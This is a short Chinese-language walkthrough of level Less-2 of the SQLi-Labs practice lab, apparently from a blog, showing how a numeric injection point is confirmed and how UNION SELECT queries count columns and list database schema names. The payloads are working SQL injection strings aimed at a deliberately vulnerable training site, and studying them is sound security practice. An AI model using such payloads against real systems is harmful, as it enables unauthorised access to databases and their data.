SQLi-Labs 练习总结 Page-1 Less-2

Less-2 GET-Error based-Intiger based

SQLi-Labs 练习总结 Page-1 Less-2_第1张图片
图片0.png

1.试探,判断注入类型

输入id=1'

SQLi-Labs 练习总结 Page-1 Less-2_第2张图片
图片1.png

根据回显 near '' LIMIT 0,1' at line 1,判断是个数字型注入。
可以成功注入的有:

2.判断字段数量

?id=-1 union select 1,2…… --+

通过增加select后面的数字个数,判断字段数量。若数量不对,返回:

图片2.png

知道页面显示正常,这里字段数是3,却能显示的是第2,3字段。

SQLi-Labs 练习总结 Page-1 Less-2_第3张图片
图片2-2.png

3.数据库

?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+
SQLi-Labs 练习总结 Page-1 Less-2_第4张图片
图3

后续部分同 Less-1,没有差别。

你可能感兴趣的:(SQLi-Labs 练习总结 Page-1 Less-2)